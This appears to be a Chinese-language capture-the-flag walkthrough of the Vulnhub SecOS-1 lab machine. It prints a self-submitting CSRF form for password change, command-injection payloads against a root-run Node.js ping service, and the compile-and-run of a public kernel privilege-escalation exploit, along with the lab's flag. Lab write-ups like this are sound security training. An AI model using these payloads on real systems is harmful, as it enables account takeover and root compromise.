Vulnhub SecOS

环境下载地址:https://www.vulnhub.com/entry/secos-1,88/

环境配置

这里没有给OVF文件,给的vmdk文件,环境配置可以新建一个虚拟机

解析

这里我先使用zenmap扫了一下C段,发现了靶机的存在

访问一下8081端口

按流程注册一个账号登录,尝试存在漏洞的地方

当看到这个页面的时候

我以为会存在越权漏洞修改spiderman的密码,然而并没有,接下来我在前端代码的注释里发现了

1
<!--<li><a href="/hint">Wanna help?</a></li>!-->

原来有个hint页面,访问在后发现了

1
2
3
First: the admin visits the website (really) frequently
Second: He runs it locally, on 127.0.0.1.
Third: CSRF and /(http:\/\/[-\/\.\w:0-9\?&]+)/gi, I think that's enough

那么这里就可以结合上面的change password来进行csrf攻击,这里构造poc.html可以使用神器burp suite来构造

1
2
3
4
5
6
7
8
9
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://192.168.56.101:8081/change-password" method="POST">
<input type="hidden" name="password" value="test" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

给的代码为,但是这个需要点击,修改一下

1
2
3
4
5
6
7
8
9
10
11
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form name="change" action="http://127.0.0.1:8081/change-password" method="POST">
<input type="hidden" name="password" value="p0desta" />
</form>
<script type="text/javascript">
document.change.submit();
</script>
</body>
</html>

在本地起一个php服务,让其可以访问到该页面,然后

发送过去之后等待一会密码会被修改为p0desta,登录之

提权

提权一

用这个密码连接ssh,这里我用的工具是MobaXterm,在home下发现

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
spiderman@SecOS-1:/$ cd home
spiderman@SecOS-1:/home$ ls
secosadmin spiderman
spiderman@SecOS-1:/home$ cd spiderman
spiderman@SecOS-1:~$ ls
tmp vnwa
spiderman@SecOS-1:~$ cd vnwa
spiderman@SecOS-1:~/vnwa$ ls
internalServer.js lib LICENSE node_modules package.json public scripts server.js views
spiderman@SecOS-1:~/vnwa$ cat internalServer.js
var fs = require('fs');
var express = require('express');
var http = require('http');
var sys = require('sys')
var exec = require('child_process').exec;
var crypto = require('crypto');

var utils = require('./lib/utils.js');
var model = require('./lib/model.js');

var app = express();
var server = http.createServer(app);

var logger = function (req, res, next) {
console.log(req.connection.remoteAddress + " tried to access : " + req.url);
next(); // Passing the request to the next handler in the stack.
}

// Configuration
app.configure(function () {
// Session management
app.use(express.cookieParser());
app.use(express.session({secret: 'privateKeyForSession'}));
app.use("/js", express.static(__dirname + '/public/js')); // javascript folder
app.use("/css", express.static(__dirname + '/public/css')); // javascript folder

app.set('views', __dirname + '/views'); // views folder
app.set('view engine', 'ejs'); // view engine for this projet : ejs

app.use(express.bodyParser()); // for POST Requests
app.use(logger); // Here you add your logger to the stack.
app.use(app.router); // The Express routes handler.
});


app.get('/', function (req, res) {
res.render('ping.ejs', {
isConnected: req.session.isConnected,
isAdmin: req.session.isAdmin
});
});

// Update password
app.post('/', function (req, res) {
ip = req.body.ip
if (ip == "") {
utils.redirect(req, res, '/ping-status');
} else {
// getting the command with req.params.command
var child;
// console.log(req.params.command);
child = exec('ping ' + ip, function (error, stdout, stderr) {
res.render('ping.ejs', {
isConnected: req.session.isConnected,
message: stdout,
isAdmin: req.session.isAdmin
});
});
}
});

server.listen(9000, '127.0.0.1', function() {
console.log("Listening on port 9000");
});

发现9000端口有起的一个服务,

1
2
3
4
spiderman@SecOS-1:~/vnwa$ ps -aux | grep inter
root 1025 0.0 0.1 4692 1068 ? Ss 08:58 0:00 sudo -u root sh -c /usr/local/bin/node /home/spiderman/vnwa/internalServer.js
root 1028 0.0 0.0 2268 488 ? S 08:58 0:00 sh -c /usr/local/bin/node /home/spiderman/vnwa/internalServer.js
root 1029 0.0 1.5 78144 16144 ? Sl 08:58

可以发现是以root权限运行的,这里为了测试方便将端口转发出去

1
ssh -L localhost:2000:localhost:9000 spiderman@192.168.56.101

可以参考这篇文章https://blog.fundebug.com/2017/04/24/ssh-port-forwarding/

那么访问本地的2000端口就可以访问到靶机9000端口的服务

简单看一下代码可以知道这里存在命令注入漏洞

1
127.0.0.1 -c 1 && ls

这里加-c 1是因为linux下的ping命令是不会停止的

这里也可以看出是root权限运行的,这里可以直接拿flag。

1
127.0.0.1 -c 1 && cat /root/flag.txt

当然也可以弹个shell,不再细说。


提权二
1
2
3
4
5
6
7
8
9

spiderman@SecOS-1:~/vnwa$ uname -a
Linux SecOS-1 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:08:14 UTC 2014 i686 i686 i686 GNU/Linux
spiderman@SecOS-1:~/vnwa$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04 LTS
Release: 14.04
Codename: trusty

google可以搜索到提权的exp:https://www.exploit-db.com/exploits/37292/

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
spiderman@SecOS-1:~/vnwa$ ls
exploit.c lib node_modules public server.js
internalServer.js LICENSE package.json scripts views
spiderman@SecOS-1:~/vnwa$ gcc exploit.c -o exploit
spiderman@SecOS-1:~/vnwa$ ls
exploit internalServer.js LICENSE package.json scripts views
exploit.c lib node_modules public server.js
spiderman@SecOS-1:~/vnwa$ ./exploit
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami
root
# ls
LICENSE exploit.c lib package.json scripts views
exploit internalServer.js node_modules public server.js
# cd /root
# ls
flag.txt
# cat flag.txt
Hey,

Congrats, you did it !

The flag for this first (VM) is: MickeyMustNotDie.
Keep this flag because it will be needed for the next VM.

If you liked the Web application, the code is available on Github.
(https://github.com/PaulSec/VNWA)

There should be more VMs to come in the next few weeks/months.

Twitter: @PaulWebSec
GitHub : PaulSec